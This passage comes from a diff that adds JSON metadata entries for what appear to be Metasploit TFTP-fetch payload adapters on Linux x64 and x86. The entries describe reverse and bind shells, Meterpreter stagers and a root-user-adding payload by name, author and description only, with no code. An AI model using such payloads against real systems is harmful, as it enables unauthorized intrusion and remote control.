Linux x64 Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/tftp/x64/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "epi " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell_bind_ipv6_tcp", + "check": false, 
+ "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell_bind_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x64/shell_bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/tftp/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x64/shell_bind_tcp_random_port": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/cmd/linux/tftp/x64/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Geyslan G. 
Bem " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell_bind_tcp_random_port", + "staged": false + }, + "payload_cmd/linux/tftp/x64/shell_find_port": { + "name": "TFTP Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/tftp/x64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "mak" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell_find_port", + "staged": false + }, + 
"payload_cmd/linux/tftp/x64/shell_reverse_ipv6_tcp": { + "name": "TFTP Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/tftp/x64/shell_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "epi " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell_reverse_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x64/shell_reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": 
false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x64", + "adapted_refname": "linux/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x86/adduser": { + "name": "TFTP Fetch, Linux Add User", + "fullname": "payload/cmd/linux/tftp/x86/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "vlad902 ", + "spoonm " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nCreate a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/adduser", + "staged": false + }, + "payload_cmd/linux/tftp/x86/chmod": { + "name": "TFTP Fetch, Linux Chmod", + "fullname": "payload/cmd/linux/tftp/x86/chmod", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nRuns chmod on specified file with specified mode", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/chmod", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + 
"session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/chmod", + "staged": false + }, + "payload_cmd/linux/tftp/x86/exec": { + "name": "TFTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/tftp/x86/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "vlad902 ", + "Geyslan G. Bem " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nExecute an arbitrary command or just a /bin/sh shell", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/exec", + "staged": false + }, + "payload_cmd/linux/tftp/x86/generic/debug_trap": { + "name": "TFTP Fetch, Generic x86 Debug Trap", + "fullname": "payload/cmd/linux/tftp/x86/generic/debug_trap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "robert " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nGenerate a debug trap in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, 
+ "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/generic/debug_trap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "generic/debug_trap", + "staged": false + }, + "payload_cmd/linux/tftp/x86/generic/tight_loop": { + "name": "TFTP Fetch, Generic x86 Tight Loop", + "fullname": "payload/cmd/linux/tftp/x86/generic/tight_loop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "jduck " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nGenerate a tight loop in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/generic/tight_loop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "generic/tight_loop", + "staged": false + }, + "payload_cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp": { + "name": "TFTP Fetch, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for an IPv6 
connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid": { + "name": "TFTP Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": 
"linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp": { + "name": "TFTP Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/bind_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_cmd/linux/tftp/x86/meterpreter/bind_tcp": { + "name": "TFTP Fetch, Bind TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + 
"is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid": { + "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_cmd/linux/tftp/x86/meterpreter/find_tag": { + "name": "TFTP Fetch, Find Tag Stager", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer 
McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nUse an established connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/find_tag", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/find_tag" + }, + "payload_cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_ipv6_tcp", + "staged": true, + 
"stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_cmd/linux/tftp/x86/meterpreter/reverse_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "tkmru" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": 
"/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_cmd/linux/tftp/x86/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + 
"Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/x86/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/x86/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/x86/meterpreter_reverse_tcp", + "aliases": [], + "rank": 
300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x86/metsvc_bind_tcp": { + "name": "TFTP Fetch, Linux Meterpreter Service, Bind TCP", + "fullname": "payload/cmd/linux/tftp/x86/metsvc_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hdm " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/metsvc_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/metsvc_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x86/metsvc_reverse_tcp": { + "name": "TFTP 
Fetch, Linux Meterpreter Service, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/x86/metsvc_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hdm " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/metsvc_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/metsvc_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x86/read_file": { + "name": "TFTP Fetch, Linux Read File", + "fullname": "payload/cmd/linux/tftp/x86/read_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hal" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nRead up to 4096 bytes from the local file system and write it back out to the specified file descriptor", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/read_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": 
"cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/read_file", + "staged": false + }, + "payload_cmd/linux/tftp/x86/shell/bind_ipv6_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": 